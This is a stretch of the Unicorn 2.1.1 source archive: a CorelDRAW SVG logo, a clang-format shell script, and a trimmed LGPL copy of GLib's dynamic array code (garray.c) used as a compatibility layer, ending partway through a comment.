<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<!-- Creator: CorelDRAW X7 -->
<svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="113.496mm" height="95.7057mm" version="1.1" style="shape-rendering:geometricPrecision; text-rendering:geometricPrecision; image-rendering:optimizeQuality; fill-rule:evenodd; clip-rule:evenodd" viewBox="0 0 11350 9571" xmlns:xlink="http://www.w3.org/1999/xlink">
 <defs>
  <style type="text/css">
   <![CDATA[
    .fil2 {fill:#FEFEFE}
    .fil0 {fill:#E62129}
    .fil1 {fill:black}
   ]]>
  </style>
 </defs>
 <g id="Layer_x0020_1">
  <metadata id="CorelCorpID_0Corel-Layer"/>
  <g id="_307418024">
   <path class="fil0" d="M7101 1434l-1 0c487,-344 1238,-810 1653,-1216 2,-11 4,-25 -31,-17 -121,27 -433,159 -512,209 21,20 106,47 151,60 -50,6 -96,-1 -140,-5 -129,-13 -220,38 -344,99 -41,20 -79,39 -117,59 -1,26 231,92 280,88 -78,15 -136,9 -191,3 -85,-11 -151,-31 -233,-3 -113,39 -249,120 -353,173 -1,32 281,131 341,127 -240,21 -249,-21 -421,-41 -30,-3 -64,0 -113,19 -39,15 -205,96 -272,131l7 -6 0 1 -15 6c6,37 35,99 38,145 3,45 225,145 273,168z"/>
   <g>
    <path class="fil1" d="M1118 8018l0 -1025 373 0 0 1025c0,311 -155,466 -466,466l-559 0c-311,0 -466,-155 -466,-466l0 -1025 373 0 0 1025c0,62 31,93 93,93l559 0c62,0 93,-31 93,-93zm1084 -339l0 805 -373 0 0 -1581 1119 895 0 -805 373 0 0 1581 -1119 -895zm1830 805l-373 0 0 -1491 373 0 0 1491zm1457 -466l0 -93 372 0 0 93c0,311 -155,466 -466,466l-559 0c-311,0 -466,-155 -466,-466l0 -559c0,-311 155,-466 466,-466l559 0c311,0 466,155 466,466l0 93 -372 0 0 -93c0,-62 -32,-93 -94,-93l-559 0c-62,0 -93,31 -93,93l0 559c0,62 31,93 93,93l559 0c62,0 94,-31 94,-93zm1829 -559c0,-62 -31,-93 -93,-93l-559 0c-62,0 -94,31 -94,93l0 559c0,62 32,93 94,93l559 0c62,0 93,-31 93,-93l0 -559zm-93 -466c310,0 466,155 466,466l0 559c0,311 -156,466 -466,466l-559 0c-311,0 -466,-155 -466,-466l0 -559c0,-311 155,-466 466,-466l559 0zm804 0l1025 0c311,0 466,155 466,466 0,274 -121,427 -362,460l452 565 -478 0 -448 -559 -282 0 0 559 -373 0 0 -1491zm373 373l0 186 652 0c62,0 93,-31 93,-93 0,-62 -31,-93 -93,-93l-652 0zm1829 313l0 805 -373 0 0 -1581 1119 895 0 -805 373 0 0 1581 -1119 -895z"/>
    <path class="fil1" d="M2004 9551l0 -638 598 0 0 93 -498 0 0 159 327 0 0 92 -327 0 0 202 526 0 0 92 -626 0zm1409 0l0 -638 52 0 405 448 0 -448 98 0 0 638 -52 0 -405 -447 0 447 -98 0zm1846 -248l0 -92 262 0 0 193c-36,54 -84,96 -144,124 -59,28 -128,43 -206,43 -117,0 -213,-32 -288,-95 -75,-64 -112,-144 -112,-242 0,-97 37,-178 112,-242 76,-64 171,-96 288,-96 74,0 139,13 196,38 57,26 105,63 142,112l-76 55c-27,-35 -64,-63 -110,-83 -46,-20 -97,-30 -152,-30 -87,0 -158,23 -214,69 -56,47 -84,105 -84,176 0,70 28,129 84,175 55,46 126,69 214,69 55,0 106,-10 152,-29 47,-20 79,-46 98,-76l0 -69 -162 0zm1086 248l0 -639 101 0 0 639 -101 0zm962 0l0 -638 52 0 405 448 0 -448 98 0 0 638 -52 0 -405 -447 0 447 -98 0zm1413 0l0 -638 598 0 0 93 -499 0 0 159 327 0 0 92 -327 0 0 202 526 0 0 92 -625 0z"/>
    <polygon class="fil1" points="0,9165 1300,9165 1300,9257 0,9257 "/>
    <polygon class="fil1" points="10050,9165 11350,9165 11350,9257 10050,9257 "/>
   </g>
   <path class="fil0" d="M6093 1928c-68,808 676,845 742,827 143,29 409,219 409,219 19,168 46,178 119,216 169,90 504,48 596,-158 108,-240 -244,-791 -381,-961 -171,-211 -25,-195 -113,-398 -50,-114 -146,-235 -238,-336 -44,-25 -232,-136 -241,-182 -2,-14 -8,-32 -15,-50 82,-41 348,-534 371,-616 -193,-13 -642,82 -703,233 18,76 95,130 112,206 -120,-51 -172,-117 -292,-167l-130 -761c-315,130 -399,508 -365,798 -331,-279 -667,-228 -1127,-51 208,6 316,80 361,163 -266,94 -570,161 -1121,197 82,136 254,233 389,258 -92,61 -845,-136 -1223,557 199,-199 740,-294 870,-68 -214,106 -242,312 -608,374 86,95 355,102 539,95 -464,216 -780,610 -1364,699 501,155 749,74 1051,18 -278,249 -557,583 -506,1176 59,-275 360,-529 591,-410 -122,205 -326,620 -669,844 309,48 610,-116 760,-221 -167,266 -251,557 -394,833 79,67 162,130 248,189 12,-10 24,-19 35,-29l247 134c3,25 6,49 10,73 56,30 113,58 171,85 15,-40 35,-81 58,-118 24,59 49,118 75,176 368,150 769,232 1190,232 1063,0 2002,-524 2576,-1328 -86,-12 -1934,-233 -1529,-1704 -337,-164 -688,-486 -501,-1044zm-790 -679c-807,838 -83,1836 699,2200 -576,-416 -1302,-1282 -699,-2200zm-737 870c-408,546 -247,1080 64,1388 102,102 229,188 370,267 657,365 1590,567 2009,1199 -159,-412 -359,-636 -616,-799 -603,-381 -1604,-489 -1884,-1204 -94,-241 -81,-522 57,-851z"/>
   <path class="fil0" d="M5319 6134c1651,121 3087,-1120 3207,-2771 53,-727 -158,-1412 -552,-1962l-9 7c250,477 375,1027 333,1603 -119,1642 -1547,2875 -3189,2756 -974,-71 -1804,-603 -2293,-1366 442,957 1377,1651 2503,1733z"/>
   <path class="fil2" d="M6976 1558c117,44 208,189 330,310 -118,-13 -192,-47 -279,-53 74,-103 -11,-187 -51,-257z"/>
  </g>
 </g>
</svg>
unicorn-2.1.1/docs/unicorn1-logo.png
[binary PNG image data omitted]
unicorn-2.1.1/docs/unicorn1-logo.txt
[ASCII-art Unicorn logo; original line layout lost in extraction]
unicorn-2.1.1/format.sh
#!/bin/bash
find . -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";"
find ./msvc -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";"
find ./include -maxdepth 2 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";"
find ./tests/unit -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";"
find ./samples -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";"
find ./qemu "(" -name "unicorn.c" -or -name "unicorn.h" -or -name "unicorn_arm.c" -or -name "unicorn_aarch64.c" ")" -exec clang-format -i -style=file "{}" ";"
unicorn-2.1.1/glib_compat/
unicorn-2.1.1/glib_compat/README
This is a compatible glib library, customized for Unicorn.
Based on glib 2.64.4.
unicorn-2.1.1/glib_compat/garray.c
/* GLIB - Library of useful routines for C programming
 * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Modified by the GLib Team and others 1997-2000. See the AUTHORS
 * file for a list of people on the GLib Team. See the ChangeLog
 * files for a list of changes. These files are distributed with
 * GLib at ftp://ftp.gtk.org/pub/gtk/.
 */

/*
 * MT safe
 */

//#include "config.h"

#include <string.h>
#include <stdlib.h>

#include "glib_compat.h"

#define g_mem_gc_friendly FALSE

/**
 * SECTION:arrays
 * @title: Arrays
 * @short_description: arrays of arbitrary elements which grow
 *     automatically as elements are added
 *
 * Arrays are similar to standard C arrays, except that they grow
 * automatically as elements are added.
 *
 * Array elements can be of any size (though all elements of one array
 * are the same size), and the array can be automatically cleared to
 * '0's and zero-terminated.
 *
 * To create a new array use g_array_new().
 *
 * To add elements to an array, use g_array_append_val(),
 * g_array_append_vals(), g_array_prepend_val(), and
 * g_array_prepend_vals().
 *
 * To access an element of an array, use g_array_index().
 *
 * To set the size of an array, use g_array_set_size().
 *
 * To free an array, use g_array_free().
 *
 * Here is an example that stores integers in a #GArray:
 * |[<!-- language="C" -->
 *   GArray *garray;
 *   gint i;
 *   // We create a new array to store gint values.
 *   // We don't want it zero-terminated or cleared to 0's.
 *   garray = g_array_new (FALSE, FALSE, sizeof (gint));
 *   for (i = 0; i < 10000; i++)
 *     g_array_append_val (garray, i);
 *   for (i = 0; i < 10000; i++)
 *     if (g_array_index (garray, gint, i) != i)
 *       g_print ("ERROR: got %d instead of %d\n",
 *                g_array_index (garray, gint, i), i);
 *   g_array_free (garray, TRUE);
 * ]|
 */

#define MIN_ARRAY_SIZE 16

typedef struct _GRealArray GRealArray;

/**
 * GArray:
 * @data: a pointer to the element data. The data may be moved as
 *     elements are added to the #GArray.
 * @len: the number of elements in the #GArray not including the
 *     possible terminating zero element.
 *
 * Contains the public fields of a GArray.
 */
struct _GRealArray
{
  guint8 *data;
  guint   len;
  guint   alloc;
  guint   elt_size;
  guint   zero_terminated : 1;
  guint   clear : 1;
  // gatomicrefcount ref_count;
  GDestroyNotify clear_func;
};

/**
 * g_array_index:
 * @a: a #GArray
 * @t: the type of the elements
 * @i: the index of the element to return
 *
 * Returns the element of a #GArray at the given index. The return
 * value is cast to the given type.
 *
 * This example gets a pointer to an element in a #GArray:
 * |[<!-- language="C" -->
 *   EDayViewEvent *event;
 *   // This gets a pointer to the 4th element in the array of
 *   // EDayViewEvent structs.
* event = &g_array_index (events, EDayViewEvent, 3); * ]| * * Returns: the element of the #GArray at the index given by @i */ #define g_array_elt_len(array,i) ((array)->elt_size * (i)) #define g_array_elt_pos(array,i) ((array)->data + g_array_elt_len((array),(i))) #define g_array_elt_zero(array, pos, len) \ (memset (g_array_elt_pos ((array), pos), 0, g_array_elt_len ((array), len))) #define g_array_zero_terminate(array) G_STMT_START{ \ if ((array)->zero_terminated) \ g_array_elt_zero ((array), (array)->len, 1); \ }G_STMT_END static guint g_nearest_pow (guint num); static void g_array_maybe_expand (GRealArray *array, guint len); /** * g_array_new: * @zero_terminated: %TRUE if the array should have an extra element at * the end which is set to 0 * @clear_: %TRUE if #GArray elements should be automatically cleared * to 0 when they are allocated * @element_size: the size of each element in bytes * * Creates a new #GArray with a reference count of 1. * * Returns: the new #GArray */ GArray* g_array_new (gboolean zero_terminated, gboolean clear, guint elt_size) { g_return_val_if_fail (elt_size > 0, NULL); return g_array_sized_new (zero_terminated, clear, elt_size, 0); } /** * g_array_sized_new: * @zero_terminated: %TRUE if the array should have an extra element at * the end with all bits cleared * @clear_: %TRUE if all bits in the array should be cleared to 0 on * allocation * @element_size: size of each element in the array * @reserved_size: number of elements preallocated * * Creates a new #GArray with @reserved_size elements preallocated and * a reference count of 1. This avoids frequent reallocation, if you * are going to add many elements to the array. Note however that the * size of the array is still 0. * * Returns: the new #GArray */ GArray* g_array_sized_new (gboolean zero_terminated, gboolean clear, guint elt_size, guint reserved_size) { GRealArray *array; g_return_val_if_fail (elt_size > 0, NULL); array = g_slice_new (GRealArray); array->data = NULL; array->len = 0; array->alloc = 0; array->zero_terminated = (zero_terminated ? 1 : 0); array->clear = (clear ? 1 : 0); array->elt_size = elt_size; array->clear_func = NULL; // g_atomic_ref_count_init (&array->ref_count); if (array->zero_terminated || reserved_size != 0) { g_array_maybe_expand (array, reserved_size); g_array_zero_terminate(array); } return (GArray*) array; } /** * g_array_set_clear_func: * @array: A #GArray * @clear_func: a function to clear an element of @array * * Sets a function to clear an element of @array. * * The @clear_func will be called when an element in the array * data segment is removed and when the array is freed and data * segment is deallocated as well. @clear_func will be passed a * pointer to the element to clear, rather than the element itself. * * Note that in contrast with other uses of #GDestroyNotify * functions, @clear_func is expected to clear the contents of * the array element it is given, but not free the element itself. * * Since: 2.32 */ void g_array_set_clear_func (GArray *array, GDestroyNotify clear_func) { GRealArray *rarray = (GRealArray *) array; g_return_if_fail (array != NULL); rarray->clear_func = clear_func; } /** * g_array_ref: * @array: A #GArray * * Atomically increments the reference count of @array by one. * This function is thread-safe and may be called from any thread. 
/**
 * g_array_ref:
 * @array: A #GArray
 *
 * Atomically increments the reference count of @array by one.
 * This function is thread-safe and may be called from any thread.
 *
 * Returns: The passed in #GArray
 *
 * Since: 2.22
 */
GArray *g_array_ref (GArray *array)
{
  //GRealArray *rarray = (GRealArray*) array;
  g_return_val_if_fail (array, NULL);

  // g_atomic_ref_count_inc (&rarray->ref_count);

  return array;
}

typedef enum
{
  FREE_SEGMENT = 1 << 0,
  PRESERVE_WRAPPER = 1 << 1
} ArrayFreeFlags;

static gchar *array_free (GRealArray *, ArrayFreeFlags);

/**
 * g_array_unref:
 * @array: A #GArray
 *
 * Atomically decrements the reference count of @array by one. If the
 * reference count drops to 0, all memory allocated by the array is
 * released. This function is thread-safe and may be called from any
 * thread.
 *
 * Since: 2.22
 */
void g_array_unref (GArray *array)
{
  GRealArray *rarray = (GRealArray*) array;
  g_return_if_fail (array);

  // if (g_atomic_ref_count_dec (&rarray->ref_count))
    array_free (rarray, FREE_SEGMENT);
}

/**
 * g_array_get_element_size:
 * @array: A #GArray
 *
 * Gets the size of the elements in @array.
 *
 * Returns: Size of each element, in bytes
 *
 * Since: 2.22
 */
guint g_array_get_element_size (GArray *array)
{
  GRealArray *rarray = (GRealArray*) array;

  g_return_val_if_fail (array, 0);

  return rarray->elt_size;
}

/**
 * g_array_free:
 * @array: a #GArray
 * @free_segment: if %TRUE the actual element data is freed as well
 *
 * Frees the memory allocated for the #GArray. If @free_segment is
 * %TRUE it frees the memory block holding the elements as well. Pass
 * %FALSE if you want to free the #GArray wrapper but preserve the
 * underlying array for use elsewhere. If the reference count of
 * @array is greater than one, the #GArray wrapper is preserved but
 * the size of @array will be set to zero.
 *
 * If array contents point to dynamically-allocated memory, they should
 * be freed separately if @free_seg is %TRUE and no @clear_func
 * function has been set for @array.
 *
 * This function is not thread-safe. If using a #GArray from multiple
 * threads, use only the atomic g_array_ref() and g_array_unref()
 * functions.
 *
 * Returns: the element data if @free_segment is %FALSE, otherwise
 *     %NULL. The element data should be freed using g_free().
 */
gchar *g_array_free (GArray   *farray,
                     gboolean  free_segment)
{
  GRealArray *array = (GRealArray*) farray;
  ArrayFreeFlags flags;

  g_return_val_if_fail (array, NULL);

  flags = (free_segment ? FREE_SEGMENT : 0);

  /* if others are holding a reference, preserve the wrapper but
   * do free/return the data */
  //if (!g_atomic_ref_count_dec (&array->ref_count))
    flags |= PRESERVE_WRAPPER;

  return array_free (array, flags);
}

static gchar *array_free (GRealArray     *array,
                          ArrayFreeFlags  flags)
{
  gchar *segment;

  if (flags & FREE_SEGMENT)
    {
      if (array->clear_func != NULL)
        {
          guint i;

          for (i = 0; i < array->len; i++)
            array->clear_func (g_array_elt_pos (array, i));
        }

      g_free (array->data);
      segment = NULL;
    }
  else
    segment = (gchar*) array->data;

  if (flags & PRESERVE_WRAPPER)
    {
      array->data = NULL;
      array->len = 0;
      array->alloc = 0;
    }
  else
    {
      g_slice_free1 (sizeof (GRealArray), array);
    }

  return segment;
}
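/* Illustrative sketch, not from the original GLib sources: the two
 * g_array_free() modes as implemented by array_free() above. With
 * @free_segment == TRUE both the wrapper and the element buffer are
 * released; with FALSE only the wrapper goes away and the raw element
 * buffer is handed back to the caller, who owns it from then on.
 *
 * |[<!-- language="C" -->
 *   GArray *a = g_array_new (FALSE, FALSE, sizeof (gint));
 *   gint v = 42;
 *   g_array_append_val (a, v);
 *
 *   // take ownership of the underlying buffer
 *   gint *raw = (gint *) g_array_free (a, FALSE);
 *   // raw[0] is still 42 here; release the buffer manually when done
 *   g_free (raw);
 * ]|
 */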
/**
 * g_array_append_vals:
 * @array: a #GArray
 * @data: (not nullable): a pointer to the elements to append to the end of the array
 * @len: the number of elements to append
 *
 * Adds @len elements onto the end of the array.
 *
 * Returns: the #GArray
 */

/**
 * g_array_append_val:
 * @a: a #GArray
 * @v: the value to append to the #GArray
 *
 * Adds the value on to the end of the array. The array will grow in
 * size automatically if necessary.
 *
 * g_array_append_val() is a macro which uses a reference to the value
 * parameter @v. This means that you cannot use it with literal values
 * such as "27". You must use variables.
 *
 * Returns: the #GArray
 */
GArray* g_array_append_vals (GArray        *farray,
                             gconstpointer  data,
                             guint          len)
{
  GRealArray *array = (GRealArray*) farray;

  g_return_val_if_fail (array, NULL);

  if (len == 0)
    return farray;

  g_array_maybe_expand (array, len);

  memcpy (g_array_elt_pos (array, array->len), data,
          g_array_elt_len (array, len));

  array->len += len;

  g_array_zero_terminate (array);

  return farray;
}

/**
 * g_array_prepend_vals:
 * @array: a #GArray
 * @data: (nullable): a pointer to the elements to prepend to the start of the array
 * @len: the number of elements to prepend, which may be zero
 *
 * Adds @len elements onto the start of the array.
 *
 * @data may be %NULL if (and only if) @len is zero. If @len is zero, this
 * function is a no-op.
 *
 * This operation is slower than g_array_append_vals() since the
 * existing elements in the array have to be moved to make space for
 * the new elements.
 *
 * Returns: the #GArray
 */

/**
 * g_array_prepend_val:
 * @a: a #GArray
 * @v: the value to prepend to the #GArray
 *
 * Adds the value on to the start of the array. The array will grow in
 * size automatically if necessary.
 *
 * This operation is slower than g_array_append_val() since the
 * existing elements in the array have to be moved to make space for
 * the new element.
 *
 * g_array_prepend_val() is a macro which uses a reference to the value
 * parameter @v. This means that you cannot use it with literal values
 * such as "27". You must use variables.
 *
 * Returns: the #GArray
 */
GArray* g_array_prepend_vals (GArray        *farray,
                              gconstpointer  data,
                              guint          len)
{
  GRealArray *array = (GRealArray*) farray;

  g_return_val_if_fail (array, NULL);

  if (len == 0)
    return farray;

  g_array_maybe_expand (array, len);

  memmove (g_array_elt_pos (array, len), g_array_elt_pos (array, 0),
           g_array_elt_len (array, array->len));

  memcpy (g_array_elt_pos (array, 0), data, g_array_elt_len (array, len));

  array->len += len;

  g_array_zero_terminate (array);

  return farray;
}
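/* Illustrative sketch, not from the original GLib sources: why
 * prepending is the slower operation. Every g_array_prepend_val()
 * memmove()s all existing elements up one slot, so building an
 * n-element array front-first costs O(n^2) element moves overall,
 * whereas appending is amortized O(1) per element thanks to the
 * doubling growth policy in g_array_maybe_expand().
 *
 * |[<!-- language="C" -->
 *   GArray *a = g_array_new (FALSE, FALSE, sizeof (gint));
 *   gint i;
 *
 *   for (i = 0; i < 3; i++)
 *     g_array_prepend_val (a, i);
 *
 *   // elements are now 2, 1, 0: each prepend shifted the others up
 *   g_array_free (a, TRUE);
 * ]|
 */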
*/ if (index_ >= array->len) { g_array_maybe_expand (array, index_ - array->len + len); return g_array_append_vals (g_array_set_size (farray, index_), data, len); } g_array_maybe_expand (array, len); memmove (g_array_elt_pos (array, len + index_), g_array_elt_pos (array, index_), g_array_elt_len (array, array->len - index_)); memcpy (g_array_elt_pos (array, index_), data, g_array_elt_len (array, len)); array->len += len; g_array_zero_terminate (array); return farray; } /** * g_array_set_size: * @array: a #GArray * @length: the new size of the #GArray * * Sets the size of the array, expanding it if necessary. If the array * was created with @clear_ set to %TRUE, the new elements are set to 0. * * Returns: the #GArray */ GArray* g_array_set_size (GArray *farray, guint length) { GRealArray *array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); if (length > array->len) { g_array_maybe_expand (array, length - array->len); if (array->clear) g_array_elt_zero (array, array->len, length - array->len); } else if (length < array->len) g_array_remove_range (farray, length, array->len - length); array->len = length; g_array_zero_terminate (array); return farray; } /** * g_array_remove_index: * @array: a #GArray * @index_: the index of the element to remove * * Removes the element at the given index from a #GArray. The following * elements are moved down one place. * * Returns: the #GArray */ GArray* g_array_remove_index (GArray *farray, guint index_) { GRealArray* array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); g_return_val_if_fail (index_ < array->len, NULL); if (array->clear_func != NULL) array->clear_func (g_array_elt_pos (array, index_)); if (index_ != array->len - 1) memmove (g_array_elt_pos (array, index_), g_array_elt_pos (array, index_ + 1), g_array_elt_len (array, array->len - index_ - 1)); array->len -= 1; if (g_mem_gc_friendly) g_array_elt_zero (array, array->len, 1); else g_array_zero_terminate (array); return farray; } /** * g_array_remove_index_fast: * @array: a @GArray * @index_: the index of the element to remove * * Removes the element at the given index from a #GArray. The last * element in the array is used to fill in the space, so this function * does not preserve the order of the #GArray. But it is faster than * g_array_remove_index(). * * Returns: the #GArray */ GArray* g_array_remove_index_fast (GArray *farray, guint index_) { GRealArray* array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); g_return_val_if_fail (index_ < array->len, NULL); if (array->clear_func != NULL) array->clear_func (g_array_elt_pos (array, index_)); if (index_ != array->len - 1) memcpy (g_array_elt_pos (array, index_), g_array_elt_pos (array, array->len - 1), g_array_elt_len (array, 1)); array->len -= 1; if (g_mem_gc_friendly) g_array_elt_zero (array, array->len, 1); else g_array_zero_terminate (array); return farray; } /** * g_array_remove_range: * @array: a @GArray * @index_: the index of the first element to remove * @length: the number of elements to remove * * Removes the given number of elements starting at the given index * from a #GArray. The following elements are moved to close the gap. 
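 *
 * A short sketch of the effect (hypothetical contents):
 * |[<!-- language="C" -->
 * // array holds the gints {10, 20, 30, 40, 50}
 * g_array_remove_range (array, 1, 2);
 * // array now holds {10, 40, 50}
 * ]|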
* * Returns: the #GArray * * Since: 2.4 */ GArray* g_array_remove_range (GArray *farray, guint index_, guint length) { GRealArray *array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); g_return_val_if_fail (index_ <= array->len, NULL); g_return_val_if_fail (index_ + length <= array->len, NULL); if (array->clear_func != NULL) { guint i; for (i = 0; i < length; i++) array->clear_func (g_array_elt_pos (array, index_ + i)); } if (index_ + length != array->len) memmove (g_array_elt_pos (array, index_), g_array_elt_pos (array, index_ + length), (array->len - (index_ + length)) * array->elt_size); array->len -= length; if (g_mem_gc_friendly) g_array_elt_zero (array, array->len, length); else g_array_zero_terminate (array); return farray; } /* Returns the smallest power of 2 greater than n, or n if * such power does not fit in a guint */ static guint g_nearest_pow (guint num) { guint n = num - 1; g_assert (num > 0); n |= n >> 1; n |= n >> 2; n |= n >> 4; n |= n >> 8; n |= n >> 16; #if SIZEOF_INT == 8 n |= n >> 32; #endif return n + 1; } static void g_array_maybe_expand (GRealArray *array, guint len) { guint want_alloc; /* Detect potential overflow */ //if ((G_MAXUINT - array->len) < len) // g_error ("adding %u to array would overflow", len); want_alloc = g_array_elt_len (array, array->len + len + array->zero_terminated); if (want_alloc > array->alloc) { want_alloc = g_nearest_pow (want_alloc); want_alloc = MAX (want_alloc, MIN_ARRAY_SIZE); array->data = g_realloc (array->data, want_alloc); if (g_mem_gc_friendly) memset (array->data + array->alloc, 0, want_alloc - array->alloc); array->alloc = want_alloc; } } /** * SECTION:arrays_pointer * @title: Pointer Arrays * @short_description: arrays of pointers to any type of data, which * grow automatically as new elements are added * * Pointer Arrays are similar to Arrays but are used only for storing * pointers. * * If you remove elements from the array, elements at the end of the * array are moved into the space previously occupied by the removed * element. This means that you should not rely on the index of particular * elements remaining the same. You should also be careful when deleting * elements while iterating over the array. * * To create a pointer array, use g_ptr_array_new(). * * To add elements to a pointer array, use g_ptr_array_add(). * * To remove elements from a pointer array, use g_ptr_array_remove(), * g_ptr_array_remove_index() or g_ptr_array_remove_index_fast(). * * To access an element of a pointer array, use g_ptr_array_index(). * * To set the size of a pointer array, use g_ptr_array_set_size(). * * To free a pointer array, use g_ptr_array_free(). * * An example using a #GPtrArray: * |[<!-- language="C" --> * GPtrArray *array; * gchar *string1 = "one"; * gchar *string2 = "two"; * gchar *string3 = "three"; * * array = g_ptr_array_new (); * g_ptr_array_add (array, (gpointer) string1); * g_ptr_array_add (array, (gpointer) string2); * g_ptr_array_add (array, (gpointer) string3); * * if (g_ptr_array_index (array, 0) != (gpointer) string1) * g_print ("ERROR: got %p instead of %p\n", * g_ptr_array_index (array, 0), string1); * * g_ptr_array_free (array, TRUE); * ]| */ typedef struct _GRealPtrArray GRealPtrArray; /** * GPtrArray: * @pdata: points to the array of pointers, which may be moved when the * array grows * @len: number of pointers in the array * * Contains the public fields of a pointer array. 
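 *
 * (In this compat layer the internal #GRealPtrArray below starts with
 * these same two fields, so a #GPtrArray pointer can safely be cast to
 * it.)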
*/ struct _GRealPtrArray { gpointer *pdata; guint len; guint alloc; // gatomicrefcount ref_count; GDestroyNotify element_free_func; }; /** * g_ptr_array_index: * @array: a #GPtrArray * @index_: the index of the pointer to return * * Returns the pointer at the given index of the pointer array. * * This does not perform bounds checking on the given @index_, * so you are responsible for checking it against the array length. * * Returns: the pointer at the given index */ static void g_ptr_array_maybe_expand (GRealPtrArray *array, guint len); /** * g_ptr_array_new: * * Creates a new #GPtrArray with a reference count of 1. * * Returns: the new #GPtrArray */ GPtrArray *g_ptr_array_new (void) { return g_ptr_array_sized_new (0); } /** * g_ptr_array_steal: * @array: a #GPtrArray. * @len: (optional) (out caller-allocates): pointer to retrieve the number of * elements of the original array * * Frees the data in the array and resets the size to zero, while * the underlying array is preserved for use elsewhere and returned * to the caller. * * Even if set, the #GDestroyNotify function will never be called * on the current contents of the array and the caller is * responsible for freeing the array elements. * * An example of use: * |[<!-- language="C" --> * g_autoptr(GPtrArray) chunk_buffer = g_ptr_array_new_with_free_func (g_bytes_unref); * * // Some part of your application appends a number of chunks to the pointer array. * g_ptr_array_add (chunk_buffer, g_bytes_new_static ("hello", 5)); * g_ptr_array_add (chunk_buffer, g_bytes_new_static ("world", 5)); * * ... * * // Periodically, the chunks need to be sent as an array-and-length to some * // other part of the program. * GBytes **chunks; * gsize n_chunks; * * chunks = g_ptr_array_steal (chunk_buffer, &n_chunks); * for (gsize i = 0; i < n_chunks; i++) * { * // Do something with each chunk here, and then free them, since * // g_ptr_array_steal() transfers ownership of all the elements and the * // array to the caller. * ... * * g_bytes_unref (chunks[i]); * } * * g_free (chunks); * * // After calling g_ptr_array_steal(), the pointer array can be reused for the * // next set of chunks. * g_assert (chunk_buffer->len == 0); * ]| * * Returns: (transfer full): the element data, which should be * freed using g_free(). * * Since: 2.64 */ gpointer *g_ptr_array_steal (GPtrArray *array, gsize *len) { GRealPtrArray *rarray; gpointer *segment; g_return_val_if_fail (array != NULL, NULL); rarray = (GRealPtrArray *) array; segment = (gpointer *) rarray->pdata; if (len != NULL) *len = rarray->len; rarray->pdata = NULL; rarray->len = 0; rarray->alloc = 0; return segment; } /** * g_ptr_array_copy: * @array: #GPtrArray to duplicate * @func: (nullable): a copy function used to copy every element in the array * @user_data: user data passed to the copy function @func, or %NULL * * Makes a full (deep) copy of a #GPtrArray. * * @func, as a #GCopyFunc, takes two arguments, the data to be copied * and a @user_data pointer. On common processor architectures, it's safe to * pass %NULL as @user_data if the copy function takes only one argument. You * may get compiler warnings from this though if compiling with GCC's * `-Wcast-function-type` warning. * * If @func is %NULL, then only the pointers (and not what they are * pointing to) are copied to the new #GPtrArray. * * The copy of @array will have the same #GDestroyNotify for its elements as * @array. * * Returns: (transfer full): a deep copy of the initial #GPtrArray. 
 *
 * Since: 2.62
 **/
GPtrArray *g_ptr_array_copy (GPtrArray *array, GCopyFunc func, gpointer user_data)
{
    gsize i;
    GPtrArray *new_array;

    g_return_val_if_fail (array != NULL, NULL);

    new_array = g_ptr_array_sized_new (array->len);
    g_ptr_array_set_free_func (new_array, ((GRealPtrArray *) array)->element_free_func);

    if (func != NULL) {
        for (i = 0; i < array->len; i++)
            new_array->pdata[i] = func (array->pdata[i], user_data);
    } else if (array->len > 0) {
        memcpy (new_array->pdata, array->pdata,
                array->len * sizeof (*array->pdata));
    }

    new_array->len = array->len;

    return new_array;
}

/**
 * g_ptr_array_sized_new:
 * @reserved_size: number of pointers preallocated
 *
 * Creates a new #GPtrArray with @reserved_size pointers preallocated
 * and a reference count of 1. This avoids frequent reallocation, if
 * you are going to add many pointers to the array. Note however that
 * the size of the array is still 0.
 *
 * Returns: the new #GPtrArray
 */
GPtrArray *g_ptr_array_sized_new (guint reserved_size)
{
    GRealPtrArray *array;

    array = g_slice_new (GRealPtrArray);

    array->pdata = NULL;
    array->len = 0;
    array->alloc = 0;
    array->element_free_func = NULL;

    // g_atomic_ref_count_init (&array->ref_count);

    if (reserved_size != 0)
        g_ptr_array_maybe_expand (array, reserved_size);

    return (GPtrArray*) array;
}

/**
 * g_array_copy:
 * @array: A #GArray.
 *
 * Create a shallow copy of a #GArray. If the array elements consist of
 * pointers to data, the pointers are copied but the actual data is not.
 *
 * Returns: (transfer container): A copy of @array.
 *
 * Since: 2.62
 **/
GArray *g_array_copy (GArray *array)
{
    GRealArray *rarray = (GRealArray *) array;
    GRealArray *new_rarray;

    g_return_val_if_fail (rarray != NULL, NULL);

    new_rarray = (GRealArray *) g_array_sized_new (rarray->zero_terminated, rarray->clear,
                                                   rarray->elt_size, rarray->alloc / rarray->elt_size);
    new_rarray->len = rarray->len;
    if (rarray->len > 0)
        memcpy (new_rarray->data, rarray->data, rarray->len * rarray->elt_size);

    g_array_zero_terminate (new_rarray);

    return (GArray *) new_rarray;
}

/**
 * g_ptr_array_new_with_free_func:
 * @element_free_func: (nullable): a function to free elements when
 *     @array is destroyed, or %NULL
 *
 * Creates a new #GPtrArray with a reference count of 1 and uses
 * @element_free_func for freeing each element when the array is destroyed
